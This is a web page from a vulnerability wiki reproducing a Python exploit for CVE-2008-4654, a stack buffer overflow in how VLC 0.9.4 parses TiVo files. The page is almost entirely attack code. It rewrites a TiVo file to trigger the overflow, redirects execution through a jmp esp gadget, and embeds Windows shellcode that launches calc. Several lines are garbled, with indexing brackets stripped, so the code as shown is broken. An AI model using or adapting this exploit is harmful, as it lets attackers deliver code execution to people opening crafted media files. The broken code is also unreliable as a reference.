Loading
0

CVE-2008-4654 VLC Media Player 0.9.0 through 0.9.4缓冲区溢出漏洞

PWNWIK.COM

,

EXP

#!/usr/bin/python
#
# VLC 0.9.4 Stack-based Buffer Overflow exploit while demuxing
# TiVo file format as it was described by Tobias Klein in his 
# 	http://www.trapkit.de/advisories/TKADV2008-010.txt	
# CVE-2008-4654
#
# Shellcode has no bad characters requirements, 
# but must be at most 187 bytes long.
#
# Exploit by Mariusz B.
#

import struct
import sys
import os

# 0x68f0cfad : jmp esp 
# {PAGE_EXECUTE_READ} libqt4_plugin.dll ASLR: False, Rebase: False, SafeSEH: False, OS: False
RETURN_ADDRESS = 0x68f0cfad

TIVO_MAGIC = 0xf5467abd

# Aligns ESP stack pointer
# push    esp
# pop     eax
# sub     ax, 0x180
# mov     esp, eax
STACK_ALIGN = "\x54\x58\x66\x2d\x80\x01\x8b\xe0"


#
# Shellcode to be used - no bad chars.
# It must be at most 187 characters long!
#
# Below: 112 bytes long CreateProcess("calc")
# 	source: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
#
SHELLCODE =  (
	"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
	"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
	"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
	"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
	"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
	"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
	"\x45\x81\x3e\x43\x72\x65\x61\x75"
	"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
	"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
	"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
	"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
	"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
	"\x6c\x63\x89\xe2\x52\x52\x53\x53"
	"\x53\x53\x53\x53\x52\x53\xff\xd7"
)


def replace(data, start, length, what):
	for (n, r) in zip(range(start, start+length), list(what)):
		datan = r

	return data

def main(argv):
	if len(argv) == 1:
		print 'Usag: vlc-exploit.py <tivo-file>'
		sys.exit(1)

	data = bytearray()
	with open(argv1, 'rb') as f:
		data = bytearray(f.read())

	pos = data.find(str(struct.pack('>I', TIVO_MAGIC)))
	if pos == -1:
		print '! Not a valid TiVo file.'
		sys.exit(1)

	print '. Got a valid TiVo file.'

	# Step 1: Replace TiVo's i_map_size variable in order to trigger out of bounds read.
	data = replace(data, pos + 20, 4, struct.pack('>I', 0xff))

	# Step 2: Prepare a return address as a JMP ESP
	data = replace(data, pos + 0x5c, 4, struct.pack('<I', RETURN_ADDRESS))
	data = replace(data, pos + 0x60, 4, '\x90' * 4)
	#data = replace(data, pos + 0x60, 4, '\xcc' + '\x90' * 3)	# DEBUG the shellcode

	# Step 3: Insert a shellcode
	print '+ Writing {} bytes long shellcode...'.format(len(SHELLCODE))
	data = replace(data, pos + 0x64, len(STACK_ALIGN), STACK_ALIGN)
	data = replace(data, pos + 0x64 + len(STACK_ALIGN), len(SHELLCODE), SHELLCODE)

	print '+ Exploit prepared.'

	new_file = os.path.join(os.path.dirname(argv1), os.path.splitext(argv1)0 + '-exploit.ty')
	with open(new_file, 'wb') as f:
		f.write(data)

	print '+ Prepared file: "{}"'.format(new_file)

if __name__ == '__main__':
	main(sys.argv)

免费、自由、人人可编辑的漏洞库